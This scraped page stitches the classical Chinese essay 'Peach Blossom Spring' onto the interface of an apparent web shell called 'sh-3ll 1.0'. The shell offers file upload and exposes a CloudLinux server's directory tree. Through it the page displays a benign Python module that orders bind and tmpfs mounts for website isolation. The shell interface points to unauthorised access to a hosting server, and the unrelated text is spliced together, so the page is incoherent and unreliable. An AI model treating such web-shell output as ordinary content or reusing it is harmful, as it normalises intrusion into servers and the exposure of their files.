晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 sh-3ll

HOME


sh-3ll 1.0
DIR:/opt/cloudlinux/venv/lib64/python3.11/site-packages/clcagefslib/webisolation/
Upload File :
Current File : //opt/cloudlinux/venv/lib64/python3.11/site-packages/clcagefslib/webisolation/mount_ordering.py
#!/opt/cloudlinux/venv/bin/python3 -sbb
# -*- coding: utf-8 -*-
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENCE.TXT
#
"""
Module for processing and ordering mount configurations for website isolation.

This module handles the logic for ordering mounts with proper parent-child
relationships, remounting parents after children, and adding mkdir attributes
when paths are inside tmpfs mounts.

Optimization: tmpfs mounts that are inside another tmpfs are skipped because
the parent tmpfs already makes them inaccessible.
"""

from __future__ import annotations

from dataclasses import dataclass

from .mount_config import MountEntry
from .mount_types import MountType


@dataclass(frozen=True)
class DocrootTree:
    """Pre-computed tree structure for docroots."""

    children: dict[str | None, tuple[str, ...]]
    roots: tuple[str, ...]
    all_docroots: frozenset[str]


def build_docroot_tree(all_docroots: set[str]) -> DocrootTree:
    """
    Build the parent-child tree structure from docroots.

    Call this once and pass the result to process_ordered_mounts() for each
    active docroot to avoid rebuilding the tree on every call.

    Args:
        all_docroots: Set of all docroot paths

    Returns:
        DocrootTree structure to pass to process_ordered_mounts()
    """

    def get_immediate_parent(path: str) -> str | None:
        """Get the closest parent of path that exists in all_docroots."""
        pos = path.rfind("/")
        while pos > 0:
            parent = path[:pos]
            if parent in all_docroots:
                return parent
            pos = parent.rfind("/")
        return None

    children_lists: dict[str | None, list[str]] = {p: [] for p in all_docroots}
    children_lists[None] = []  # roots
    for path in all_docroots:
        parent = get_immediate_parent(path)
        children_lists[parent].append(path)

    # Sort and convert to tuples (immutable)
    children = {k: tuple(sorted(v)) for k, v in children_lists.items()}
    roots = children[None]

    return DocrootTree(children=children, roots=roots, all_docroots=frozenset(all_docroots))


def process_ordered_mounts(
    active_docroot: str, tree: DocrootTree, uid: int, gid: int
) -> list[MountEntry]:
    """
    Process docroots and return ordered mounts list.

    Mounts are generated to a fake home directory structure. The active docroot
    is mounted from its real path to the corresponding path inside the fake home.
    Other docroots are hidden with tmpfs mounts in the fake home.

    Rules:
    1. Only one record is marked as "docroot" (the active_docroot)
    2. Parents must be mounted before children
    3. If parent is mounted first, it must be rw mount with remount to ro after all child records mounted
    4. If path is inside another path that we marked as tmpfs, we must add mkdir attribute

    Args:
        active_docroot: The docroot that should be marked as "docroot" in the output
        tree: Pre-computed DocrootTree from build_docroot_tree()
        uid: User ID for tmpfs mounts
        gid: Group ID for tmpfs mounts

    Returns:
        List of MountEntry in the correct order
    """
    children = tree.children
    tmpfs_paths = tree.all_docroots - {active_docroot}
    tmpfs_attrs = (f"uid={uid}", f"gid={gid}", "mode=0750")

    mounts: list[MountEntry] = []

    def visit(path: str, inside_tmpfs: bool):
        """Process a path and its children recursively."""
        is_tmpfs = path in tmpfs_paths
        path_children = children[path]
        has_children = bool(path_children)

        # Skip tmpfs mounts that are inside another tmpfs - they're already hidden
        # Still need to recurse in case there's an active docroot nested within
        if is_tmpfs and inside_tmpfs:
            for child in path_children:
                visit(child, inside_tmpfs=True)
            return

        # Generate mount operation
        # All mounts into fake_home need mkdir since overlay storage starts empty
        if path == active_docroot:
            mounts.append(MountEntry(MountType.BIND, path, path, ("mkdir",)))
        elif is_tmpfs:
            opts = ("mkdir",) + tmpfs_attrs if has_children else ("mkdir", "ro") + tmpfs_attrs
            mounts.append(MountEntry(MountType.BIND, "tmpfs", path, opts))
        else:
            opts = ("mkdir",) if has_children else ("mkdir", "ro")
            mounts.append(MountEntry(MountType.BIND, path, path, opts))

        # Process children
        child_inside_tmpfs = inside_tmpfs or is_tmpfs
        for child in path_children:
            visit(child, child_inside_tmpfs)

        # On leave: remount if this was a tmpfs parent with children
        if has_children and is_tmpfs:
            mounts.append(MountEntry(MountType.BIND, path, path, options=("ro", "remount")))

    # Start from roots (paths with no parent in all_docroots)
    for root in tree.roots:
        visit(root, inside_tmpfs=False)

    return mounts